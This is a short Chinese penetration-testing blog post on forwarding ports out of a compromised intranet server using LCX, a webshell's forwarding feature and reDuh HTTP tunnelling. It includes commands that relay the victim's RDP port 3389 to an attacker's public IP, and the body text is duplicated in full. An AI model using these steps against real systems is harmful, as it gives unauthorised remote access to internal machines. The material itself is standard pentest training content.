[渗透测试] 端口转发
2015-07-12 15:04
274 查看
如果服务器在内网中,一般情况下攻击者无法连接,但是如果其拥有服务器权限后,就可以使用端口转发技术。
一、LCX转发
首先在攻击者自己的机器上执行如下命令:
lcx -listen 500 8888
随后在被攻击的计算机上执行以下命令:
lcx.exe -slave [攻击者公网IP] 500 127.0.0.1 3389
最后攻击者利用“127.0.0.1:8888”就可以连接到终端。
二、使用Shell脚本自带端口转发功能
此功能节约了上传LCX的时间
首先还是要在攻击者端执行lcx -listen 500 8888
在webshell的脚本转发位置进行如下设置:
本地IP:127.0.0.1
本地端口:3389
远程IP:(设置成攻击者IP)
远程端口:500
最后在攻击者端执行“127.0.0.1:8888”
三、reDuh转发
reDuh被称为内网渗透利器,可以将内网的端口以HTTP/HTTPS隧道的方式转发到本机。
reDuh的客户端由Java编写,使用时必须先安装JRE环境。reDuh GUI是一个C++的Windows GUI版本,使用起来更方便。
将程序自带的服务器脚本上传至网站,网站支持哪种语言就上传哪种版本。
随后打开reDuh GUI界面,在URL输入框里输入连接(刚刚上传脚本文件所在的URL),点击Start。这一步成功后可继续设置其他项目。
在“Remote Host”中输入“127.0.0.1”.“Remote Port”中输入要转发的端口3389,在“Local Port”输入本地连接的端口,然后点击“Create”按钮,即可创建HTTP/HTTPS隧道,在右侧会显示连接信息。
隧道创建后,就可以连接终端,连接方式仍为“127.0.0.1:8888”
一、LCX转发
首先在攻击者自己的机器上执行如下命令:
lcx -listen 500 8888
随后在被攻击的计算机上执行以下命令:
lcx.exe -slave [攻击者公网IP] 500 127.0.0.1 3389
最后攻击者利用“127.0.0.1:8888”就可以连接到终端。
二、使用Shell脚本自带端口转发功能
此功能节约了上传LCX的时间
首先还是要在攻击者端执行lcx -listen 500 8888
在webshell的脚本转发位置进行如下设置:
本地IP:127.0.0.1
本地端口:3389
远程IP:(设置成攻击者IP)
远程端口:500
最后在攻击者端执行“127.0.0.1:8888”
三、reDuh转发
reDuh被称为内网渗透利器,可以将内网的端口以HTTP/HTTPS隧道的方式转发到本机。
reDuh的客户端由Java编写,使用时必须先安装JRE环境。reDuh GUI是一个C++的Windows GUI版本,使用起来更方便。
将程序自带的服务器脚本上传至网站,网站支持哪种语言就上传哪种版本。
随后打开reDuh GUI界面,在URL输入框里输入连接(刚刚上传脚本文件所在的URL),点击Start。这一步成功后可继续设置其他项目。
在“Remote Host”中输入“127.0.0.1”.“Remote Port”中输入要转发的端口3389,在“Local Port”输入本地连接的端口,然后点击“Create”按钮,即可创建HTTP/HTTPS隧道,在右侧会显示连接信息。
隧道创建后,就可以连接终端,连接方式仍为“127.0.0.1:8888”
相关文章推荐
- 黑马day17 ajax入门案例
- C# 实现按钮自动点击
- ORCLE数据库用户、权限、角色管理
- (7.2.9)SQL Server 跨库复制表数据的解决办法
- Mac下的Vim:神器MacVim的安装
- Codeforces Round #259 (Div. 2) E. Little Pony and Summer Sun Celebration
- Merge Two Sorted Lists
- 使用C#来编写一个异步的Socket服务器
- 深度学习之二:特征
- You can Solve a Geometry Problem too(计算多个线段的交点个数)
- [MFC]Colors程序(1):自制菜单项
- Swing-JCheckBox用法-入门
- 获取本机的IPV4地址
- (从零开始学Android)编辑框EditText与按钮Button学习心得
- G.729
- UVa123 Searching Quickly
- HDU2066最短路
- BFS宽度优先搜索算法
- 练声
- Linux多线程编程及线程同步方法总结